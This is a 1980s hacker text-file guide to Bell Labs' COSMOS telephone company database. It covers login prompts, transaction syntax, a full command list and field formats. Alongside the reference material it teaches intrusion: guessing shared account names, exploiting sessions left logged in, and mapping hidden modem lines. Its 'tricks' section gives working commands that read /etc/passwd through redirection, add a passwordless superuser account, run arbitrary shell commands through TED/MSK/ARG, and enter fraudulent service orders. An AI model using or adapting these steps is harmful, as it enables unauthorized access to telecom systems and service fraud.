- PRESENTS
- ************************************************************
- ************************************************************
- *** ***
- *** TTT H H EEE ***
- *** T H H E ***
- *** T HHH EEE ***
- *** T H H E ***
- *** T H H EEE ***
- *** ***
- *** ***
- *** DD EEE FFF III N N III TTT III V V EEE ***
- *** D D E F I NN N I T I V V E ***
- *** D D EEE FFF I N NN I T I V V EEE ***
- *** D D E F I N NN I T I V V E ***
- *** DD EEE F III N N III T III V EEE ***
- *** ***
- *** ***
- *** CCCC OOO SS M M OOO SS ***
- *** C O O S S MM MM O O S S ***
- *** C O O S M M M O O S ***
- *** C O O S S M M M O O S S ***
- *** CCCC OOO SS M M OOO SS ***
- *** ***
- *** ***
- ************************************************************
- ************************************************************
- BY
- ERIK BLOODAXE
- PRELUDE
- In the past, many files have been written about COSMOS. I
- have always been rather disappointed in their quality and in
- their presentation, so I have taken on the responsibility of
- doing one myself. This should sum up COSMOS for everyone who
- reads it. It contains formats for very useful commands, an
- entire transaction list, COSMOS "tricks", and a list of all COSMOS
- abbreviations and their formats.
- =============================================================================
- INTRODUCTION
- Bell Labs COmputer System for Mainframe OperationS (COSMOS)
- is basically just a database for maintaining records of
- equipment and other line information and generating reports
- on that information. The system is usually set up on a DEC
- PDP 11/45 or 11/70.
- The main responsibilities of the COSMOS system are:
- Maintaining records
- Issuing reports
- Processing service and work orders
- Assigning telephone numbers
- Load balancing for switching computers
- Output of ESS recent change information
- LOGGING ON
- When connecting to COSMOS the system will respond with:
- ;Login: or LOGIN:
- at which point you enter a username. The system will then
- prompt:
- PASSWORD:
- at which point you enter the password for that username.
- Finally, the system will prompt:
- WC?
- which asks you to enter the wire center for the exchange you
- will be using in your work. After successfully completing
- the login sequence you will be given the system prompt which
- will be the two letter id of the wire center you entered and a
- percent sign: "WC% "
- To log off at this or at any point you can type control-y.
- One of the major flaws in COSMOS security is that unless a
- control-y is received the terminal is not logged out, even if
- the user disconnects. Many times when you connect to COSMOS,
- you will be dropped right into the "WC% " prompt. This even
- happens on major BOC packet networks quite often. If you are
- lucky enough to receive a 'WC#' prompt you have access to the
- COSNIX shell, and can issue various unix-like commands, like
- ls, cd, cat, et cetera.
- COSMOS usernames are usually issued as two letters corresponding to
- whatever center will be using that account, and two numbers.
- EX: LA01
- Using the above example "LA01" there will most probably be numerous
- "LA" accounts, possibly "LA01" through "LA15" or higher. This is true
- for most COSMOS usernames. More often than not, all accounts used by the
- same center will have the same password as well. Some common usernames
- and their owners are:
- ROOT System Manager
- SYS System Manager
- ML Loop Assignment
- LA Loop Assignment
- DN Main Distributing Frame
- IN Repair Service
- RS Repair Service
- CE LNAC
- LK Account to execute INQuiries only
- JA Mizar
- WLI Work Load Indicator
- Usernames may vary from BOC to BOC, but these are fairly standard.
- =============================================================================
- COSMOS TRANSACTION COMMANDS
- COSMOS commands are three letter acronyms. I will explain in
- depth the commands I have found most useful, and then list
- the remainder. Remember, do not attempt to learn the formats for COSMOS
- transactions online. You will probably not figure out correct inputs, and
- will most likely cause problems for the system manager and yourself.
- Commands are entered in a specific ways. The command desired is
- entered at the WC% prompt. A second string of data is entered at
- the next line which designates the type of transaction desired.
- This line is prefixed with on of the following four letters:
- H - Header Line
- I - In Line
- O - Out Line
- R - Remark Line
- The most commonly used line is the H line. It is a required input in
- almost all COSMOS transactions. From the second line on, COSMOS will
- prompt with an underscore "_" as the system prompt, to let the user
- know that it is waiting for input. When all needed data has been entered,
- the command is executed by typing a "." at the beginning of a new line.
- If you wish to process a command, but stay in command level in order to
- process further commands after the one you are currently entering has
- finished, a ";" can be entered at the beginning of a new line.
- To cancel the transaction you are entering, a "Q" should be entered at
- the beginning of a new line. To interrupt output, the break character
- is "^C". When entering criteria, you may enter all like data (all H-line, all
- I-line, etc...) on one line using a "/" between input prefixes:
- EX: H TN 222-0000,222-9999/RMKT SWBT?/US 1FB
- is the same as entering:
- H TN 222-0000,222-9999
- _H RMKT SWBT?
- _H US 1FB
- One of the most commonly used commands is INQ (Complete
- Circuit Inquiry). There is also a short form of INQ called
- ISH. This command requires only the use of H lines. Multiple H lines
- can be entered to narrow a search or to print multiple reports.
- Valid H line facilities used are:
- BL Bridge Lifter
- CON Concentrator
- CP Cable Pair
- CKID Circuit ID
- MR Message Register
- OE Office Equipment Number
- PL Private Line Circuit Number
- TK Trunk Cable and Pair Number
- TN Telephone Number
- TP Tie Pair
- XN "X" Number
- TRE Transmission Equipment
- TER Terminal Number
- GP Group Number
- ORD Work Order
- EX: To print information on telephone number 222-2222
- WC% INQ
- H TN 222-2222
- _.
- EX: To print information on cable pair 11-1111
- WC% INQ
- H CP 11-1111
- _.
- INQ will print a full report whatever circuit you examine, while ISH
- will print a shorter, easier to read report. Below is an actual ISH
- done on a Telenet node.
- CA% ISH
- H TN 225-8004
- _.
- TN 225-8004
- ST AU DATE 06-03-83 HT GP 0-0081 BTN 225-8004 TYPE X
- OE 006-012-200
- ST WK DATE 03-04-86 CS 1FBH US 1BH FEA TNNL
- LCC TF2
- LOC WF12003
- TER 0-0081-0001
- ST WK
- RMKG GTE.TELENET
- CP 95-0701
- ST WK DATE 01-24-86 RZ 13
- LOC WF12009
- TP 6105-0910
- ST WK DATE 01-24-86
- LOC F12003
- LOC F42001
- FROM FAC OE 006-012-200 TO FAC TP 6206-0107
- TP 6206-0107
- ST WK DATE 01-24-86
- LOC F22029
- LOC F42002
- HUNT SEQUENCE FOR TN 225-8004
- TER 0001-0040
- ** ISH COMPLETED 02-29-99 12:00
- CA%
- When you pull an inquiry on a number that you are interested in, you will
- be given its cable pair, its order number, any numbers that connect to
- it through a hunt sequence, and you will see any remarks entered about the
- number. This information can prove to be very valuable. For instance:
- You suspect that a company has a modem online, yet you don't want to waste
- time sequentially dialing thousands of numbers. You can simply enter
- an ISH on the number to get its cable pair, then begin pulling ISH
- reports on cable pairs close to the main one. Then you need only dial
- twenty or so numbers that are in the same area as the main number, and
- you will find the computer.
- Another extremely valuable command is SIR (Sorting Inquiry by Range).
- With SIR, you can print the circuit information on all lines that match
- specified criteria within a specified range of numbers. This command
- requires only H line input, but numerous lines may be entered in order to
- narrow down the search. You may also use the wildcard character ("?") to
- encompass a larger range when doing a SIR. There are many applications
- for SIR, but I will only show examples on a few I have found to be
- most useful.
- Many times entries have special remarks entered about the circuit. These
- are usually entered as RMKT (Remarks on Telephone Number), but they may be
- entered as RMKO (Remarks on Office Equipment) or RMKP (Remarks on Cable
- Pair), depending upon what the person entering felt like typing.
- Most of the time the remarks really don't correspond like they should.
- Telephone companies are pretty thorough about remarking on a line that
- they own and they will usually use the RMKT prefix.
- EX: To find all telephone company (Southwestern Bell) lines in prefix 222
- WC% SIR
- H TN 222-0000,222-9999
- _H RMKT SWBT?
- _.
- The "?" after SWBT acts as a wildcard. Typing SWB? would perform the same
- search.
- You may also want to search by STT (Telephone number status). Some types of
- STT are:
- AU Auxiliary
- NP Non-published
- OF Official (telco owned)
- TS Test
- Another way to distinguish types of number is by CS (Customer Class of
- Service). CS values tend to vary from BOC to BOC, but business lines
- will usually look like "1FB", or at least contain a "B". Residences
- will usually look like "1FR." Sometimes telco lines are listed as "1OF",
- but may also be entered as "1FB". On lines in a hunt group, the CS will
- be appended with the letter "H", as "1FBH".
- Let's say a company owns a block on an exchange (333) running from 1000 to
- 3500. You want to find all possible computer numbers in that area. Chances
- are good that they are not listed.
- EX:
- WC% SIR
- H TN 333-1000,333-3500
- _H STT NP
- _H CS 1FB
- _.
- The above would list all non-published business numbers from 333-1000
- to 333-3500.
- To find all numbers that are translated 800 numbers in the same prefix range
- as above, you can do the following:
- EX:
- WC% SIR
- H TN 333-1000,333-3500
- _H PL ?800?
- _.
- This will prints reports on all private lines registered as 800 numbers.
- There is also a shorter version of SIR, LTN (List Telephone Numbers), and a
- more detailed version, GFR (General Facility Report), but I have found
- SIR to be the better of the three to use for my purposes.
- In order to change line attributes, or to create new lines you will need
- to use two commands SOE (Service Order Entry), and RCP (Recent Change
- Packager). These two commands are pretty detailed in what they can do,
- so I will just cover a few of their options.
- SOE will allow you to assign a new circuit, and specify the desired telephone
- number, custom calling features, billing telephone number, etc.
- SOE requires both "H" and "I" lines of input. The best way to enter
- a new service order is to have COSMOS pick your new telephone number and
- assign the needed office equipment number. If you want to pick your own
- telephone number, the number you pick must have a status (STO) of SP, LI, RS,
- or PD (with a disconnect date before the due date on your new service order).
- This is so that you do not try to assign a number that is currently working
- to your new service order. You can check this by doing an ISH on all the
- variations of numbers you desire, and checking the STO. You can also get a
- list of available numbers in a given prefix using the NAI command. You
- should also do a SIR of recent entries, to try to find the proper format of
- order numbers, so that you do not reuse one, or make one up that is formatted
- incorrectly. Another method to make sure that you have the correct formatting
- of order numbers is to call the phone company and request the installation of
- a line in the area you are working in. They will tell you your service order
- number for reference. Later, you can merely cancel the order. You will also
- have to find a valid cable pair, so do an ISH on whatever number written in
- your junction box that is not working, and then make sure there is no pending
- connect orders entered on it.
- To enter a service order for a new connection, having COSMOS pick an available
- telephone number and assign proper office equipment numbers, you would do
- the following:
- EX:
- WC% SOE
- H ORD SO123456/OT NC/DD DD-MM-YY (Use valid Day, Month, Year for Due Date)
- _I TN ?/US 1FR/FEA TNNL/OE ?/CP XX-YYYY (Use valid cable pair for XX-YYYY)
- _.
- You would now need to enter RCP and make a correctly formatted recent change
- report for the order you entered so RCMAC can pick up the order and directly
- enter it into the switch. What RCP does is take your order and change it into
- actual switch programming, using templates that are stored in directories
- corresponding to what type of switching equipment is used for that WC.
- (EX: ess5a)
- EX: To create a recent change package for the order entered above
- WC% RCP
- H ORD SO123455
- _.
- Using SOE you can specify custom calling features, you can specify billing
- telephone numbers, you can establish service as coin, and several other
- options by adding "I" line information corresponding to that particular
- option.
- _I CCF XXXXXX (XXXXXX is valid custom calling features)
- _I BTN NNX-XXXX (NNX-XXXX is valid billing TN)
- _I TT C
- To get a list of spare (available) telephone numbers in a given prefix, you
- can use the NAI (Telephone Number Assignment Inquiry) command. You only need
- enter H line criteria. In addition to searching by prefix (NNX), you can
- search by switch type (TYP), or rate zone (RTZ).
- EX: To select one spare telephone number in 555 and make it reserved status
- WC% NAI
- H TT X/NNX 555/STT RS
- _.
- You may also have NAI print out several available numbers, however, you cannot
- change the status unless you are printing one listing.
- EX:
- WC% NAI
- H TT X/NNX 555/LC XX (Where XX is a number between 1 and 25)
- _.
- To get a listing of all prefixes that exist in the Wire Center you are
- logged in under, you can use the command DDS (Display DS Table). This
- command will list the ranges that exist for a given input.
- To list all telephone numbers in a given WC:
- WC% DDS
- H TN ?
- _.
- To list all cable pair ranges:
- WC% DDS
- H CP ?
- _.
- To change from one Wire Center to another, you use the command WCC (Wire
- Center Change). This is a very straight forward command.
- EX:
- WC% WCC NW
- NW%
- To allow for redirection in your COSMOS commands, you must execute the
- DIO command. This command is rather important for manipulating commands
- to work for you.
- EX:
- WC% DIO
- To see what transactions other people logged in are running, you can use the
- command TSNAP (on certain generics)
- EX:
- WC% TSNAP
- There are about one hundred other COSMOS commands that are all defined at the
- end of this file. I cannot go into detail on all of them but I will list them
- and their meanings.
- =============================================================================
- COSMOS TRICKS
- Even if you don't have full COSNIX access, you can basically execute
- any command or read any file that exists in the system. Using the INQ
- (or ISH) command and redirection, you can open and display any file.
- EX: To display the password file
- WC% INQ </ETC/PASSWD
- This will display the file, however, since this is a flaw in the command,
- it thinks the file is to be input for INQ, and each line will be preceded
- with "ILLEGAL LINE TYPE", but this can be ignored.
- Other files to look at:
- /USR/FACS/WCFILE List of all Wire Centers
- /ETC/MATRIX.P Permission Matrix (Who can execute what commands)
- You may or may not want to try the following. There is a high probability
- that you will be noticed on the system. If your local COSMOS ports are
- usually left logged in, don't bother doing this. However, if your COSMOS
- ports are always logged out, and you almost never get in, and you happen
- to stumble upon one left logged for the first time in months, it might be
- worth a try.
- There are a few ways to make a new account on COSMOS; however, you need to
- be able to write to the password file. Some systems allow this, but most do
- not.
- The easiest way involves using the echo command and redirection.
- EX:
- WC% echo "EB01::0::y:1:/tmp:/usr/cosmos:/usr/preop:/usr/so" >>/etc/passwd
- This will add user EB01 to the end of the password file.
- If you do not have access to echo you can do the same thing using the TED
- command (Text Editor).
- WC% TED >>/etc/passwd
- S.O. NO.= SO123456
- IS THIS A NEW S.O. (Y on NO) Y
- 1d
- a
- EB01::0::y:1:/tmp:/usr/cosmos:/usr/preop:/usr/so
- ^C
- 1p
- w
- q
- After executing the above, you will need to clean up the /etc/passwd
- file to remove the Service Order information put in there by TED. You will
- also need to remove the service order you created from the /usr/so/WC
- directory.
- If you cannot find a way to get shell access, you can still execute
- any COSNIX command you desire again using TED, MSK (Output a Transaction
- Mask), and ARG (Assemble and Run a Given Master File).
- EX:
- WC% TED
- S.O. NO.= SO123456
- IS THIS A NEW S.O. (Y or NO) Y
- 12
- 1d
- a
- $*
- run!
- ^c
- w
- q
- WC% MSK >/usr/so/newcmd
- SO123456
- WC% ARG
- newcmd ls /etc
- To execute the command, you need to do ARG, then the name of the
- file (which I called newcmd), then the COSNIX command you wish to
- execute.
- If you can use echo this can be done much easier.
- EX:
- WC% echo '$*' >/usr/so/newcmd
- WC% echo 'run!' >>/usr/so/newcmd
- Then you can run your command normally with ARG.
- WC% ARG
- newcmd cd ..
- IF you do not have access to echo, create a newcmd file and you can use it
- that way.
- WC% ARG
- newcmd echo EB01::0::y:1:/tmp:/usr/cosmos:/usr/so:/usr/preop >>/etc/passwd
- =============================================================================
- COSMOS COMMAND LISTING
- ACE Establish an Assignment Change Ticket
- AIT ANALIT Initialization of Tables
- ARG Assemble and Run a Given Master File
- AUD Assignment List Audit
- BAI Bridge Lifter Assignment Inquiry
- BYF Display the Bypass File
- BYP Change the Contents of the Bypass File
- CAY Create an Assembly
- CCA Change Customer Attributes
- CCT Initialize and Update the Contractor-Transducer File
- CDA Change Distribution Attributes
- CDD Change Due Date
- CDR Cut Thru DIP Report
- CFA Change Facility Attributes
- CFP Print the Class of Service/Features for an Electromechanical Entity
- CFU Change Facility Usage
- CIE Company Establish Company Initiated Change
- CLI COSMOS Processed ALIT Reports
- CPI COSMOS-PREMIS Interface
- CPM COSMOS Performance Monitor
- CTC Complete a Cable Transfer or Complete a Cable Throw
- CTE Cable Throw Order Establishment
- CTF Display the Contacter-Transducer File
- CTL Cable Throw with Line Equipment Assignment
- CTM Cable Throw Modification
- CTP Print Cable Transfer Frame Work
- CTR Cable Throw Replacement
- CTS Cable Throw Summary
- CTW Withdraw a Cable Transfer or a Cable Throw
- CUP Common Update Processor
- CXC Complex Service Order Input Checker
- CXM Centrex Table Management
- CXT Complex Order Inquiry for NAC Review
- DAY Delete an Assembly
- DBL Data Base Load
- DCN List Disconnected and Changed Numbers
- DDS Display the DS Table
- DIR Standard DIP Report
- DPN DIP Purge Number
- DPR DIP Report and Removal
- DQR Design Quota System Report
- DQS Design Quota System
- DTE Print Current Date
- EDZ Facility Emergency Assignment List
- ELA Entity Load Analysis
- ESP Print Entire Summary Table
- FDY Set Fiscal Day for LAC
- FLR Frame Layout Report
- FOR Frame Order Report
- FOS Frame Operations Summary
- FTA Frame Transfer Analysis
- FTC Frame Transfer Completion
- FTE Frame Transfer Establishment
- FTL Frame Transfer LETs
- FTR Frame Transfer Reprint
- FTW Frame Transfer Withdrawal
- FWM Frame Work Management
- GFR General Facility Report
- GLA Generate Lists for Assignment
- HBS Hunt Group Blocks of Spares
- HGR Hunt Group Report
- HGS Hunt Group Summary
- HIS Hunting ISH
- IJR Input a Jeopardy Reason
- IMU Input Measured CCS Usage Data
- INQ Complete Circuit Inquiry
- ISF Inquire on a Single Facility
- ISH Complete Circuit Inquiry Short
- JAM Jumper Activity Management
- JPH Jumper Placement History
- KPR Killer Pair Report
- KSM Create a Transaction Mask
- LAI Line Equipment Assignment Inquiry
- LBP Load Balance Parameters
- LCD LIST Cable Summary, LIT Demand Test
- LCP List Cable Pairs
- LEE NAC Related Line Equipment Transfer Order Establishment
- LEW Line Equipment Transfer Withdrawal
- LFC Load Factor Calculation
- LFR Line Failure Report
- LGN List Hunt Groups
- LIN Transmit ALIT Data to COSMOS
- LOE List Originating Line Equipment
- LSE Line and Station Transfer Order Establishment
- LSW Line and Station transfer Withdrawal
- LTN List Telephone Numbers
- MAL Manual Assignment List
- MAP Manual Assignment Parameters
- MAQ Manual Assignment File Inquiry
- MAY Modify an Assembly
- MCE Establish a Maintenance Change Ticket
- MCH Manually Change Hunt
- MCL Maintenance Change List
- MCR Establish a Maintenance Change Repair
- MCW Maintenance Change Ticket Withdrawal
- MDC Manually Disconnect a Working Circuit
- MEC Manually Establish a Circuit
- MMC Manually Modify a Circuit
- MOC MOE Order Completion
- MOE Mass OE Transfers
- MOF Mass OE Frame Transfer Listings
- MOW MOE Order Withdrawal
- MPK Modify Work Package
- MSK Output a Transaction Mask
- MTR Manually Test a Response
- NAI Telephone Number Assignment Inquiry
- NOL NAC Service Order Listing
- NSD Number Summary Display
- OIJ Orders in Jeopardy
- OPN Open-of-Day Report
- OPU Outside Plant Cable Usage
- PAK Work Packages
- PEP Position Establishment for Parties
- PFR Party Line Fill Report
- PRP Periodic Purging of Remarks
- QEX Question an Execution
- QUE Queue
- RAL Relay Assignment List
- RAP Relay Assignment Parameters
- RAS Release Sequence Number Lists and Related TN/OE
- RBS Print TBS Relays Assignment Record
- RCP Recent Change Packager
- RCR Recent Change Report
- RCS Recent Change Summary
- RED Recent Change Message Text Editor
- REL Release Non-Intercepted Numbers by Release Date
- REM Remove Frame Locations
- RET Retermination of Frame Locations
- REX Reexecute a Service Order
- RJR Remove Jeopardy Reason Codes
- RMP Recent Change Punctuation Table
- RNA Release Telephone Numbers for Assignment
- ROE Reservation Order Establishment
- ROI Reservation Order Inquiry
- ROW Reservation Order Withdrawal
- RTH Report Transaction to Count Spare and DIPed Line Equipment
- RTS Relay and Telephone Number Status Report
- RUP Request Unsolicited Processing
- SAI Summary of Action Items
- SCA Service Order Completion-Automatic
- SCF Simple Completion for MDF
- SCI Spare Cable Pair Inquiry
- SCM Standard Completion by MDF
- SCP Service Order Completion by LAC
- SCR Standard Completion by RCMAC
- SEL Selecting Lines for an Exchange Class of Service Study
- SET Statistics on Equipment and Telephone Numbers
- SGH Supply Relays for Groups of 5XB Hunts
- SIR Sorting Inquiry by Range
- SLC Subscriber Line Counts for Custom Calling Features
- SOC Service Order Cancel
- SOE Service Order Establishment
- SOF Service Order Fix
- SOH Service Order Withheld
- SOI Service Order Assignment Inquiry
- SOL Service Order Listing
- SOM Modify a Pending Service Order
- SOW Service Order Withdrawal
- STN Summarize Telephone Numbers
- SVL Service Observing Loops
- TAI Tie Pair Assignment Inquiry
- TAT Test Alignment of Frame Terminal
- TED Text Editor
- TET Display or Change Band Filter File, Retention Factor and Print Threshold
- TFC Transfer Frame Changes
- TIG Dial Transfer Input Generator
- TLC Translate LANAVAR/CPS
- TNS Telephone Number Swap
- TOC Transfer Order Completion
- TOE Transfer Order Establishment
- TOF Mass OE Transfer Order Frame Listings
- TOI Dial Transfer Order Inquiry
- TOL Transfer Order Lists
- TOO Transfer Order Omissions
- TOW Transfer Order Withdrawal
- TPU Tie Pair Usage Report
- TRC Transfer Order Recent Change Report
- TRI Transmission Equipment Assignment Inquiry
- TRW Total Reservation Order Withdrawal
- TSL Line Equipment Summary Report
- TSN Traffic Statistics on Telephone Numbers
- TSW Total Service Order Withdrawal
- TTY Get TTY Name
- TXC Text Checker
- TXM Transfer Centrex Management
- UDP Update DIP Parameters
- UES Update the Entity Summary Table
- UFO Unprinted Frame Orders
- UPC Update CCS vs. Class of Service Table
- USL List USOC (US) File Data
- UTC Update Table for Concentrator Redesign
- WCC Change Wire Center
- WCT Worksheet for Cable Throw Orders
- WFL Working Frame Location
- WOI Work Order Inquiry
- WOL Work Order Listing
- WPT Work Package Table
- WSL Work Status List
- WUL Work Unit Report for Subscriber Line Testing and Installation Assignment
- =============================================================================
- COSMOS ABBREVIATIONS AND FORMATS
- The following will be given as follows:
- Prefix and Meaning
- Format
- Code Value and Meaning
- AC Assembly category
- AC XXXX
- PERM=Permanent Facility Assemblies
- TEMP=Temporary Facility Assemblies
- AC Assembly Code
- AC XXX
- XXX=1-999
- ADSR Administration of Designed Services Review
- ADSR X
- Y=Yes, TIRKS Circuit
- N=No, COSMOS Circuit
- AGM Normal Aging Months
- AGM XX
- XX=Number of Months
- AGT Accelerated Aging Type
- AGT XXX
- BUS=Business
- RES=Residential
- AI Assigner's Initials
- AI XXX
- XXX=3 Alphanumeric Characters
- AO Allocation Order
- AO XX
- XX=Two Numeric Characters
- AR Advance Relay
- AR XYY-ZZZ
- X=Marker Group
- YY=Number Group from Frame
- ZZZ=Relay Number
- ATN Assigner's Telephone Number
- ATN XXX-XXXX
- XXX-XXXX=Assigners TN
- BL Bridge Lifter
- BL XX...XX
- XX...XX=Maximum of 17 Alphanumeric Characters
- BLS Bridge Lifter Status
- BLS X
- Y=Yes
- N=No
- BND Band Number
- BND X
- X=0-3
- BTN Billing Telephone Number
- BTN XXX-XXXX
- XXX-XXXX=Billing Telephone Number
- CA Cable Number
- CA XX...XX
- XX...XX=Maximum of 10 Alphanumeric Characters
- CAT Centrex Access Treatment
- CAT XX
- XX=Maximum of 2 Numeric Characters
- CC Call Count
- CC XX
- XX=Maximum of 2 Numeric Characters
- CCF Custom Calling Features
- CCF XXXXXX
- XXXXXX=3 to 6 Alphanumeric Characters
- CCS Hundred Call Seconds
- CCS XXXX
- XXXX=3 or 4 Numeric Characters
- CEU CCS Estimated Usage
- CEU XXXX
- XXXX=3 or 4 Numeric Characters
- CG Control Group Number
- CG X
- X=0-9
- CKID Circuit Identification
- CKID XX...XX
- XX..XX=Maximum of 61 Alphanumeric Characters
- CKL Circuit Location
- CKL XXXX
- XXXX=Maximum of 4 Alphanumeric Characters
- CLC Common Language Code for an Entity
- CLC XX...XX
- XX...XX=Maximum of 11 Alphanumeric Characters
- CLCI Common Language Circuit Identification
- CLCI XX...XX
- XX...XX=Maximum of 61 Alphanumeric Characters
- CLEI Common Language Equipment Identifier
- CLEI XX...XX
- XX...XX=Maximum of 10 Alphanumeric Characters
- CLF Creating DIPs Upper Bound Load Factor
- CLF XX
- XX=1-10
- CLL Creating DIPs Lower Bound Load Factor
- CLF X
- X=1-9
- CLS CLCI in Serial Number Format
- CLS XX...XX
- XX..XX=Maximum of 61 Alphanumeric Characters
- CLT CLCI Telephone Number Format
- CLT XX...XX
- XX...XX=Maximum of 61 Alphanumeric Characters
- CMF Capacity Main Station Fill
- CMF XXXXXX
- XXXXXX=Maximum of 6 Numeric Characters
- CMU CCS Measured Usage
- CMU XXXX
- XXXX=3 or 4 Numeric Characters
- COM Complement Size
- COM XXXX
- XXXX=1-9999
- CON Concentrator
- CON XX-YY
- XX=Maximum of 2 Alphanumeric Characters
- YY=Maximum of 2 Numeric Characters
- CP Cable and Pair Number
- CP XX...XX-YZZZ
- XX...XX=Cable ID, Maximum of 10 Alphanumeric Characters
- YZZZ=Cable Pair ID
- Y=Alphanumeric
- ZZZ=Numeric
- CPU CCS Capacity Usage
- CPU XXXX
- XXXX=3 or 4 Numeric Characters
- CRG CREG Tag
- CRG XXX
- XXX=YES or NO
- CS Customer Class of Service
- CS XXXXXX
- XXXXXX=Maximum of 6 Alphanumeric Characters
- CTID Circuit Termination Identification
- CTID XX...XX
- XX...XX=Maximum of 61 Alphanumeric Characters
- CTT Cut Through Tag
- CTT XXX
- XXX=YES or NO
- CTX Centrex Group Number
- CTX XXXX
- XXXX=Maximum of 4 numeric Characters
- DC Dial Code
- DC X
- X=1 Alpha Characters
- DD Due Date
- DD MM-DD-YY
- MM=Month
- DD=Day
- YY=Year
- DID Direct Inward Dialing
- DID XXXX
- XXXX=Maximum of 4 Numeric Characters
- DIP DIP Creation Option
- DIP X
- Y=Yes
- N=No
- DNY Denial of Service for Non-payments
- DNY X
- I=Incoming
- O=Outgoing
- B=Both
- DPA Different Premises Address
- DPA XXX
- XXX=Maximum of 3 Alphanumeric Characters
- DPT Department Name
- DPT XXX
- XXX=Maximum of 3 Alphanumeric Characters
- DST Destination of Order Response
- DST XXXX
- XXXX=Maximum of 4 Alphanumeric Characters
- DT Due Time
- DT XX
- XX=AM, PM, or 0-9
- EC ESS Entity and Control Group Number
- EC YZ
- Y=Entity Number
- Z=Control Group Identifier
- ECS Equipment Class of Service
- ECS XXXXXX
- XXXXXX=Maximum of 6 Alphanumeric Characters
- ED Enter Date
- ED MM-DD-YY
- MM=Month
- DD=Day
- YY=Year
- EN Entity
- EN X
- X=S, E, 1, 5 or 0
- EN Entity Number
- EN X
- X=0-9
- ENT Entity Number
- ENT X
- X=0-9
- EO Error Handling Option
- EO XX
- CE=Continue Processing and Establish Valid Circuits
- CW=Continue Processing and Withdraw Established Circuits
- SE=Stop Processing and Establish Valid Circuits
- SW=Stop Processing and Withdraw Established Circuits
- EQF Equipment Features
- EQF WXYZ
- W=R (Rotary) or T (Touchtone)
- Y=S (Sleeve) X (Range Extension) or N (Non-sleeve or Non-range Extension)
- X=E (Essential) or N (Non-essential)
- Z=G (Ground Start) or L (Loop Start)
- EQV Frame Equivalence
- EQV FXX
- F=The Letter "F"
- XX=Two Alphanumeric Characters
- ETC Estimated Trunk CCS Value
- ETC XXXX
- XXXX=Maximum of 4 Alphanumeric Characters
- EXD ECS Crossloading Option
- EXD XXX
- XXX=YES or NO
- FAC Type of Segment List Being Audited
- FAC XX
- TN=Telephone Number
- OE=Line Equipment
- FAC Circuit Confiruration
- FAC XXX or
- FAC TN-NNX or
- FAC CP-XX...X or
- FAC SE-YY...Y or
- FAC PL-ZZ...Z
- XXX=Any Facility Prefix
- NNX=Three Alphanumeric Characters
- XX...XX=Maximum of 10 Alphanumeric Characters
- YY...YY=Maximum of 52 Alphanumeric Characters
- ZZ...ZZ=Maximum of 61 Alphanumeric Characters
- FC From Cable
- FC XX...XX
- XX...XX=Maximum of 10 Alphanumeric Characters
- FDD Frame Due Date
- FDD MM-DD-YY
- MM=Month
- DD=Day
- YY=Year
- FEA Customer Feature
- FEA XXXX
- (Same as EQF)
- FILT Filter
- FILT XXX
- XXX=Y, YES, N, or NO
- FR Frame Identification
- FR FXX
- F=The letter "F"
- XX=Two Alphanumeric Characters
- FT Frame Time
- FT XX
- XX=01-24
- FW MDF Output Suppressed
- FW X
- Y=Frame Work Yes
- N=Frame Work No
- GP MLHG Group Number
- GP Y-XXXX
- Y=Alphanumeric Control Group
- XXXX=Numeric Group Number
- GSO Ground Start Option
- GSO X
- 1=Assigned to any OE in the Entity
- 2=Assigned to Even Levels
- 3=Only Assigned to OE Specified as Ground Start
- HC Hunt Count
- HC XXXX
- XXXX=Maximum of 4 Numeric Characters
- HF Hunt-from Telephone Number
- HF XXX-XXXX
- XXX-XXXX=Telephone Number
- HLC Highest Lead Factor Group Count
- HLC XXXX
- XXXX=1-9999
- HR Held Order Reason Code
- HR XX
- CE=Equipment Shortage
- CF=Lack of Facility
- CL=Plant Load
- CO=General Company Reasons
- C1-C5-Additional Company Reasons
- SA=Subscriber Access
- SL=Subscriber Requested Later Date
- SO=General Subscriber Reasons
- SR=Subscriber Not Ready
- S1-S5=Additional General Subscriber Reasons
- HRS Hours Prefix
- HRS XX
- XX=01-24
- HT Hunt-to Telephone Number
- HT XXX-XXXX
- XXX-XXXX=Telephone Number
- HTG Hunt-to Group Number
- HTG Y-XXXX
- Y=Alphanumeric Control Group
- XXXX=Numeric Group Number
- HTX Hunt-to X Number
- HTX XXX-YYXX of
- HTX XXX-YXX
- Y=Alphanumeric
- X=Numeric
- INIT Allocation Table Initalization
- INIT
- (No Data Entry)
- ITM Cable Pair Item Number
- ITM XX
- XX=Two Numeric Characters
- JL Jumper Length
- JL XXX
- XXX=Maximum of 3 Numeric Characters
- JR Jeopardy Reason
- JR XX
- A1=Assignment Error on CP
- A2=Assignment Error on OE
- A3=Assignment Error on TN
- A4-A9=Other Assignment Error
- C1=No SSWO for Circuit Design Group
- C2-C9=Local Code for Circuit Design Group
- E1-E9=No ESS Translations
- IB=No Installation Go-ahead for Business
- IC=No Installation Go-ahead for Coin
- ID=No Installation Go-ahead for Data
- IR=No Installation Go-ahead for Residence
- IS-No Installation Go-ahead for Special
- I1-I4=Local Codes foir No Installation Go-ahead
- RB=Business RSB
- RC=Coin RSB
- RD=Data RSB
- RR=Residence RSB
- RS=Special RSB
- R1-R4=Local Use for RSB
- LC Output Line Count
- LC XXXX
- XXXX=0-9999
- LC Line Count
- LC XXX
- XXX=0-999
- LC Pending Service Order Count
- LC
- (No Data Entry)
- LCC Line Class Code
- LCC XXX
- XXX Maximum of 3 Alphanumeric Characters
- LD Loading Division
- LD XX
- XX=Two Numeric Characters
- LDN Listed Directory Number
- LDN XXX-XXXX
- XXX-XXXX=Telephone Number
- LF Load Factor
- LF XX
- XX=1-10
- LIM Less Than the Specified Number of Pairs
- LIM XX
- XX=0-50
- LIM High Limit on Number of Specified Status Pairs in a Complement
- LIM XX
- XX=0-50
- LIM Low Limit on Number of Spare Line Equipment in Vertical Files
- LIM XX
- LIM=1-10
- LLC Low Load Group Count
- LLC XXXX
- XXXX=0-9999
- LOC Location
- LOC FXXYYY
- F=The Letter "F"
- XX=Alphanumeric
- YYY=001-999
- LP Loop Range
- LP XXX;XXX
- XXX;XXX=Six Numeric Characters
- LS List New Pending Cable Transfers
- LS XXX
- XXX=NEW
- LTI Loop Termination Identifier
- LTI XXX
- XXX=Three Alphanumeric Characters
- MASK Office Equipment Mask
- MASK OE ID
- ID=XXX-XXX-XXX =1ESS
- ID=XXX-XXXX =2ESS
- ID=XXX-XXXX =3ESS
- ID=XXXX-XXX-XX =5ESS
- ID=XXXX-XX-XX =5ESS
- ID=XXXX-X-XXXX =RSS
- ID=XXXX-XXX-XX =1XB
